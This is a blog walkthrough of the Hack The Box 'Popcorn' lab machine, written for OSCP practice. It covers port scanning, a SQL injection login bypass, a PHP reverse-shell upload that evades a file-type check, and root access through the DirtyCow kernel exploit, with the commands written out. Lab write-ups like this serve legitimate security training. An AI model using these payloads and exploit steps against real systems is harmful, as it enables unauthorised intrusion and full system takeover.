Hack The Box: Popcorn Write-up (#27)

This is my 27th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomater 10.10.10.6 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get the back the following result:

---------------------Starting Nmap Quick Scan---------------------Nmap 7.80 scan initiated Wed Oct  7 21:12:50 2020 as: nmap -Pn -T4 --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit --open -oN nmap/Quick_10.10.10.6.nmap 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
---------------------Starting Nmap Basic Scan---------------------# Nmap 7.80 scan initiated Wed Oct 7 21:12:51 2020 as: nmap -Pn -sCV -p22,80 -oN nmap/Basic_10.10.10.6.nmap 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.012s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
----------------------Starting Nmap UDP Scan----------------------# Nmap 7.80 scan initiated Wed Oct 7 21:12:59 2020 as: nmap -Pn -sU --max-retries 1 --open -oN nmap/UDP_10.10.10.6.nmap 10.10.10.6
Warning: 10.10.10.6 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.6
Host is up (0.0088s latency).
All 1000 scanned ports on 10.10.10.6 are open|filtered (968) or closed (32)

We have 2 ports open.

  • Port 22: — running SSH, OpenSSH 5.1p1 Debian 6ubuntu2.
  • Port 80: — running HTTP, Apache httpd 2.2.12 ((Ubuntu))

Before we begin, let’s make quick mental notes.

  • SSH service has no associated exploits that give us an initial foothold unless if we find any credentials during the enumeration phase and use them to access.
  • Port 80, likely to be our initial foothold. We enumerate the pages and find any possible hidden directories that have sensitive information or any admin login page.

Service Enumeration

Port 80 (HTTP)

Visit the page.

Just a default test page. Checking the source of the page gives us no further information. Next, let’s run the dirsearch scan to brute force hidden directories.

python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.6
/ -e php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We get back the following results.

The torrent/ directory seems interesting. Let’s access that directory.

We have Torrent Hoster login page. I have tested common and weak credentials but none of them works.

Let’s test for the SQL injection in the username field.

admin' or '1'='1

Great! We are successfully exploited and authenticated as admin.

Let’s click on the Upload tab as it seems to be interesting and possibly we can find file upload vulnerability.

Here I tried to upload image files but failed as it only accepts file with .torrent extension. So before we convert any file into torrent extension let’s check Browse tabs.

Here we have a torrent file name “Kali Linux”. Click on that see what we have.

We have an option to edit the screenshots. Let’s see if we can upload any image file.

Yes, we can!

Exploitation

Now, we try to upload a PHP reverse shell payload file by appending “;.png” to the file name. You can download the PHP reverse shell payload from Pentestermonkey site.

Note: Please update the ip address and port number in the payload to your attacker machine before you proceeed.

Before we doing that, lets set up a listener in Kali Linux.

nc -nlvp 53

Now, upload the file to the target.

Then we intercept this request with Burp proxy and remove the “;.png” and forward the request.

We successfully uploaded the payload file.

Refresh the page.

We can see the error message “Image File Not Found!”. Right-click on it and open in a new tab.

Go back to the listener and see if we get a shell.

Yes, we have a shell!

Let’s upgrade the shell to a fully interactive shell. Run the command below.

python -c 'import pty;pty.spawn("/bin/bash")'

Then press CTRL+Z to send the shell to the background. Next type below command and press Enter twice.

stty raw -echo;fg

Now we have a better shell with tab completion.

Grab the user.txt flag.

Privelege Escalation

Let’s check the kernel and OS version.

It seems to be a very old kernel version. It must be vulnerable to DirtyCow vulnerability.

Let’s copy the exploit from here and paste in the target machine in a file dirty.c. Next, let’s do a quick review of the exploit code.

...
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
...

The instructions are very clear. Let’s compile it.

gcc -pthread dirty.c -o dirty -lcrypt

We have successfully compiled the exploit without any error. I already give execute permission to the exploit. Next, let’s execute it.

/dirty firefart

If you get stuck while executing the exploit, press CTRL+C. Then run su command to switch user to firefart and password as firefart.

We successfully escalated our privilege to root.

Grab the root.txt flag.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Secnotes.

--

--

--

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to Get Free Crypto || Airdrop Exchange Wallet #Shorts

Understand it, Consume it, Build it

NordVPN review Showing Features, Speed, and Many More.

My Own Website Hacking Guide (Passive Reconnaissance)

Quick update from SphynxSwap CEO — October 15th, 2021.

COVID-19, Cyber Security and the “New Normal”

{UPDATE} Celebrity: Party Game Hack Free Resources Generator

Mac Hack: Automatically Move Zipped Files to Trash After Expanding

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joshua Surendran

Joshua Surendran

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

More from Medium

Bypassing perimeter security with VHD files

Tryhackme “Steel mountain” Walkthrough.

Cyber Apocalypse CTF 2022 — Puppeteer

Malware Generation Tool That Used Metamorphic Approaches